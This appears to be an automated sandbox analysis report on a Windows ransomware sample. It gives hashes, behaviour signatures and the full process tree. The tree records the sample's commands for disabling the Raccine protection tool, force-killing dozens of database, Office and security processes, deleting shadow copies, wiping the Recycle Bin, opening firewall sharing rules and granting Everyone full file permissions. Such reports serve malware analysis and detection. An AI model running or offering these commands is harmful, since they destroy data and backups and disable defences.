Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
28-05-2021 09:57
General
-
Target
b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
-
Size
358KB
-
MD5
625c0b381462e729abdcca12d424e50a
-
SHA1
9e20fd6588a16b852d5b1f5ed122706aebce58ac
-
SHA256
b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32
-
SHA512
48b289d17752bacbe65f46eee9b016264120dff5858bb87609bdfe2a10a1a1c6d12c395dc1bfa6adc8fe24b2b5da48957beec7eb0f38eaa244566ab0ac27c58d
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 10 IoCs
-
Windows security modification 2 TTPs 1 IoCs
-
Modifies WinLogon 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 58 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 61 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe"1⤵
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ragent.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rphost.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM vmwp.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9434.bat2⤵
-
C:\Windows\system32\mountvol.exemountvol3⤵
-
-
C:\Windows\system32\find.exefind "}\"3⤵
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{efb60be3-9a04-11eb-be03-806e6f6e6963}\3⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{efb60be4-9a04-11eb-be03-806e6f6e6963}\3⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{efb60be7-9a04-11eb-be03-806e6f6e6963}\3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\EditUnblock.ps1 /grant *S-1-1-0:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Downloads\SwitchSuspend.mp2 /grant *S-1-1-0:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant *S-1-1-0:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log.html /grant *S-1-1-0:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant *S-1-1-0:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant *S-1-1-0:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1864694597-18368492291145792864104144151846403743917062768221339866905516350467"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-9024193614195986071685039965362227628-19881134731764552688-16953019972105261575"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-19421121341961685177165566794-81888998-45468384410299421711885298307-1676193938"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "14322087563795506-151714575620096452581962582733-1950206146-660160763-1289807637"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-29194675721215720141789871173277275220-154090188-7647686831522294558-592149171"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-797093394837748778432307074-1885108412365318719565616685-16160587451560972555"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5185057941454043361-1851641126-362827774931623945-215756184577972235728787465"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-601463824710848689-50640841883539119651453194921133699781864379704137071071"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-400521091-1371758991450081810-107352844646299327617136518651336145942-939594904"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1516778164-1001076835135497730019048184161527536745506781012-5930597001499454744"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-806553534-16133942592083388244-1683903719875985040-32793335-1496225945916446689"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "655977988148883892-1666754247-889122059-64990611-19327821571253698882353691988"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-213519830-1112096782-1722189505-364253282-2036402011964045952-2004750389553118434"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "174521323217532932091986764952-711692717-3402855991292791527639058354-2123796278"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "709613098104017174713364443971411683941-1150310110-1860342944-7317466011748100428"1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1af2c796c268a8160d0d93e8866dc7b0
SHA16d786ee5bf9cb9b1da115ce6daffe1e7b5ef988f
SHA25694e31962442ee5f22c9ff8f6539c214dabf49e1b672a91cb042e2c0c1369abc8
SHA512af10c10ef2c7f976ebc52201d17c95cb2a5c433d39c7d722b0c1f56cb48fa27c07cf60e7de8c2d9974f6594212eb02568007da90e49ba3bca226efbe8943271e
-
MD5
f799c52b8d2fd27b13812966704cb37e
SHA112786536b73c3a4addfd4d38729f46e466b0188d
SHA256e7094a1e692c7d749106114cf2acd2cfc7511276837fd50b802dded8c39217c5
SHA5126090b10b349fd1fcf81e8c306e05a3dc53fdb410db670ddc569afdcf614eea2f61b394c359e7681ab05dfd1a58df05406e7512de9d3917f08bfd1aaa550baae8
-
MD5
2eedfa2a733ac0a3fc26945a202041c2
SHA1324354d3efdd2737affb998f72527fa4db3cecd9
SHA2560fc0c48c77eee1efabb62a26da5cc990607aaacbf836689ad80ac696fa33020e
SHA51263ee04bfb1599fdcea901c1b0030da74114b83c14dfa3327718170874b4c14dd0af8b426bf193b0e0ed7822f72dbdb1241a93972ed6bc666048abafa2222928b
-
-
-
-
-
-
-
-
-
-
Filesize
8KB
-
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Filesize
8KB
-
Filesize
8KB
-
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
-
-
-
-
-
-
-
Filesize
4KB
-
Filesize
8KB
-